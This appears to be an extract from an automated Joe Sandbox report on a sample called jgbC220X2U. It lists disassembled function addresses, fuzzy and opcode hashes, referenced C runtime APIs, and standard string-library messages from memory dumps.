Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18682d9b56306a49cd2a8c77fe8c5846ac32a1897fd6e81d6c36565c0b9b8f27
Instruction ID: e80f8aacf4ad3279a244f2df774c66680a2b06a6fa330c1710ebedc69ad0c46a
Opcode Fuzzy Hash: 18682d9b56306a49cd2a8c77fe8c5846ac32a1897fd6e81d6c36565c0b9b8f27
Instruction Fuzzy Hash: 2BD2A232608BC585EBA09F25E8403AEBBB0FB85B94F484525DF9D43B98DF38D551DB20

Function 00007FF72A077BB0 Relevance: 2.5, Strings: 2, Instructions: 33COMMON

Download Yara Rule

Strings

basic_string::assign, xrefs: 00007FF72A077BE9
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF72A077BF0

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::assign
API String ID: 3510742995-2669816585
Opcode ID: d946b78594f97b63345237074f825bab68942294293cc57e4b3a05a56d8db7bf
Instruction ID: d39302b442381d6ae056bb18dcb126fdef610015784f507f823716fea988c1df
Opcode Fuzzy Hash: d946b78594f97b63345237074f825bab68942294293cc57e4b3a05a56d8db7bf
Instruction Fuzzy Hash: 84F06DAAF05A8681FB10FF66DC014A8A361F759F98FC49162DA4C13325EE3CE596CB14

Function 00007FF72A0739B0 Relevance: 2.5, Strings: 2, Instructions: 33COMMON

Download Yara Rule

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF72A0739F0
basic_string::assign, xrefs: 00007FF72A0739E9

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::assign
API String ID: 3510742995-2669816585
Opcode ID: 0fb629e911983693792bc99811cd9f2c4d1c105f34d6e7e2433025e4001c9eaa
Instruction ID: a25df75affccf65efc41ef2d71641c16b34cff9d04b9779a76e85826034b468a
Opcode Fuzzy Hash: 0fb629e911983693792bc99811cd9f2c4d1c105f34d6e7e2433025e4001c9eaa
Instruction Fuzzy Hash: E0F06DAAE05A8A81FB20EF25DC014A8A360F759B84FC59162DA4C13325EE3CD996CB14

Function 00007FF72A00D520 Relevance: 2.3, APIs: 1, Instructions: 1074COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8019f9d4689beeee9ec491b1b24a2ba405a8c5ae55f89411cc0fd05724b3967
Instruction ID: 719934958fd7bbca897e6ed54d3e865da978bba03cff402700d4673b5879f148
Opcode Fuzzy Hash: c8019f9d4689beeee9ec491b1b24a2ba405a8c5ae55f89411cc0fd05724b3967
Instruction Fuzzy Hash: CEA2A032608BC685EB709F25E8403AEB7A1FB85B94F844571DE9D477A8EF39D441CB20

Function 00007FF729FDD290 Relevance: 2.3, APIs: 1, Instructions: 1002COMMON

Download Yara Rule

APIs

wcslen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF729FDD463

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: wcslen
String ID:
API String ID: 4088430540-0
Opcode ID: 770d13f306d44ab0df15634bdf98999a12d1a7b5609f8eef73f48c8ccd00a009
Instruction ID: 92a1fc402aa239c75bbc8213dd4a869abae9d8a322ee9dddb4f651f9dc92aeda
Opcode Fuzzy Hash: 770d13f306d44ab0df15634bdf98999a12d1a7b5609f8eef73f48c8ccd00a009
Instruction Fuzzy Hash: 5FA27F37B04B5585EB609F6AD8402AC77B4FB49B88F844522DF8D13BA8DF38D592D720

Function 00007FF729FEE815 Relevance: 2.1, APIs: 1, Instructions: 823COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: CaptureContextUnwindabort
String ID:
API String ID: 747564614-0
Opcode ID: 9771c96437e53c66694db409171a53acf42f07ea39eb25c9a924f368d38b43ab
Instruction ID: aa457cefd824ea16dc28f67be9f09b0ebcac71847d30584c26582da48e3d5771
Opcode Fuzzy Hash: 9771c96437e53c66694db409171a53acf42f07ea39eb25c9a924f368d38b43ab
Instruction Fuzzy Hash: 2972602260CBC586EBA09F25E84036EB7A1F785B94F984531EBDE07798EF3CD5449B10

Function 00007FF729FED9B3 Relevance: 2.1, APIs: 1, Instructions: 809COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: CaptureContextUnwindabort
String ID:
API String ID: 747564614-0
Opcode ID: 072316d69112b2da858875e389088e575261b37ef095c36bb152b71b4eced70b
Instruction ID: 2e9e0f62ea77339aa5a1843f3f65c92ab04e64f9dde89af1cd85eaa21fcd9250
Opcode Fuzzy Hash: 072316d69112b2da858875e389088e575261b37ef095c36bb152b71b4eced70b
Instruction Fuzzy Hash: B4729122A0C6C186EBA09F25E44436EBBB1FB85794F584531EBDE47BA4EB3CD5409B10

Function 00007FF729FEBD53 Relevance: 2.1, APIs: 1, Instructions: 805COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: CaptureContextUnwindabort
String ID:
API String ID: 747564614-0
Opcode ID: 0ec0bf10f861a189695b547f1c576f06ffde5c5f625a66d5c4b0df1f49bc4d15
Instruction ID: 3b10577a683bae285311ef8d9847161fe2742fadce1e713cec31c3c6af20c6ae
Opcode Fuzzy Hash: 0ec0bf10f861a189695b547f1c576f06ffde5c5f625a66d5c4b0df1f49bc4d15
Instruction Fuzzy Hash: 29729D22A0CBC186EBA19E25E84032EBBB1FB85B94F584535EBDE47794DF3CD5409B10

Function 00007FF729FECB93 Relevance: 2.0, APIs: 1, Instructions: 797COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: CaptureContextUnwindabort
String ID:
API String ID: 747564614-0
Opcode ID: f8c8cc79096df329ead80f6f4bbebc4336e2978759c589e16f246be3eb1cc7d2
Instruction ID: 72a4bc88ab0ec5331ad675291fb5664d20a30c5fd032b8c0ff80966f0efe6065
Opcode Fuzzy Hash: f8c8cc79096df329ead80f6f4bbebc4336e2978759c589e16f246be3eb1cc7d2
Instruction Fuzzy Hash: AE728022A08AC586EBA19F25E84032EBBB1FB85794F584531EBDE47B94DF3CD5409B10

Function 00007FF729FEF6CA Relevance: 2.0, APIs: 1, Instructions: 790COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: CaptureContextUnwindabort
String ID:
API String ID: 747564614-0
Opcode ID: 494f1ed2288b80ee4518d592791809cc3cafb78c1af2ca450c74bcfa3b390539
Instruction ID: 27bf6964cce18b880dd383cecc38761a5b5f70d1b0d58baf7e0e098639254474
Opcode Fuzzy Hash: 494f1ed2288b80ee4518d592791809cc3cafb78c1af2ca450c74bcfa3b390539
Instruction Fuzzy Hash: A7728322A0C78586EBA09F29E84032EBBA1F794B94F594531DBDE47BE4DF3CD5409B10

Function 00007FF729FD7510 Relevance: 2.0, APIs: 1, Instructions: 777stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF729FD76D1

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 627a72bd43c1d2a69cdd1d56ed029707a4c9bb5812b17d1adad9672f33e424d6
Instruction ID: 8e2e254be8f71a141e7a16e4aa6021d7db693fbfba5bd3a569cb041c93276702
Opcode Fuzzy Hash: 627a72bd43c1d2a69cdd1d56ed029707a4c9bb5812b17d1adad9672f33e424d6
Instruction Fuzzy Hash: ED72BF77B08A5185EB90DF66C84426C7BB1F744B94F984A32CE6E177A4CF38DA42D720

Function 00007FF729FD6300 Relevance: 1.9, Strings: 1, Instructions: 682COMMON

Download Yara Rule

Strings

c, xrefs: 00007FF729FD676E

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: strlen
String ID: c
API String ID: 39653677-112844655
Opcode ID: e093b1980bea6257919a4f668296e2607fe634e24e8a7074f17ce024f86b9b6c
Instruction ID: 5184ecc18c779a7c10e443d3d1d6441e2f357f81beef88e6876d31eda784d625
Opcode Fuzzy Hash: e093b1980bea6257919a4f668296e2607fe634e24e8a7074f17ce024f86b9b6c
Instruction Fuzzy Hash: 3452BE32608B8186DB609F25A84036EFBB0FB85BA4F484121EF9D47B98DF7CD551DB20

Function 00007FF729FF3DD0 Relevance: 1.9, APIs: 1, Instructions: 670COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdefa42613e425433f6d74bb6c47c0c41dfe7e9178930e9d2b3a865c42c44faa
Instruction ID: 679095fae320e97db075037bf429fee6524f6dc84c8bc73cfb8c29bb2e277e86
Opcode Fuzzy Hash: fdefa42613e425433f6d74bb6c47c0c41dfe7e9178930e9d2b3a865c42c44faa
Instruction Fuzzy Hash: 3352A32660CA8281EBA0AF25D84837EB7B1FB81B94F984131DB5D077E4EF3DE5449B10

Function 00007FF729FA4690 Relevance: 1.9, APIs: 1, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb70f96bb2f0608a351a4f623b374c6f31f3983f901bee94f40b8c81987495d3
Instruction ID: 6be7a60b5c5742d34f9a0bf47d632acc1c8bc9cdda8e284b9f26ab35f774ba9e
Opcode Fuzzy Hash: fb70f96bb2f0608a351a4f623b374c6f31f3983f901bee94f40b8c81987495d3
Instruction Fuzzy Hash: 5CF1B522A1D68241EAA1AF15A8413BEF7B1FF85794F885035DE8D07B85DF3CD604AF20

Function 00007FF729FDC250 Relevance: 1.9, Strings: 1, Instructions: 638COMMON

Download Yara Rule

Strings

c, xrefs: 00007FF729FDC6F6

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: wcslen
String ID: c
API String ID: 4088430540-112844655
Opcode ID: f5b15d5ac969f1f6db445935532bd486aaafc388d91103d39c9d187cb0cb9595
Instruction ID: e774f2d794f693491eb4625bc95b237008f6863d5fc4e8bfdfefa4fa81fe55fb
Opcode Fuzzy Hash: f5b15d5ac969f1f6db445935532bd486aaafc388d91103d39c9d187cb0cb9595
Instruction Fuzzy Hash: FA428037608B8586DB649F25E8406AEB7B0FB85B84F984025EE8D03B94DF7CD552DB20

Function 00007FF729FF0520 Relevance: 1.8, APIs: 1, Instructions: 542COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f638d1c9910fe02544c1516aae2b73b2a43b3d6d33f2f7f10a8a30b53ca940d9
Instruction ID: 0bdcab0381e61cc53b7481e33701ac1427a90e559f67668ff013f211f06a3e22
Opcode Fuzzy Hash: f638d1c9910fe02544c1516aae2b73b2a43b3d6d33f2f7f10a8a30b53ca940d9
Instruction Fuzzy Hash: 6832A32650CB4285EBA09E25984037EABB1FBA1754F9C0131DB9E07BD5EF7CE544EB10

Function 00007FF729FF2AB0 Relevance: 1.8, APIs: 1, Instructions: 530COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d3e3a79429af38c3391a5f9736ebf5545078c9a9a5bdd6e057e4ce2df90e831
Instruction ID: 7f348e652bcbb206f1fb8c300a5b7be32d98843cac4d5d34fdfa7832fc82c5ec
Opcode Fuzzy Hash: 7d3e3a79429af38c3391a5f9736ebf5545078c9a9a5bdd6e057e4ce2df90e831
Instruction Fuzzy Hash: 6E22E52290CB8241EBB09E25E8403BEA7B1FB81794F984131DB9E077D5EF7CD645AB50

Function 00007FF729FF0EB0 Relevance: 1.8, APIs: 1, Instructions: 526COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
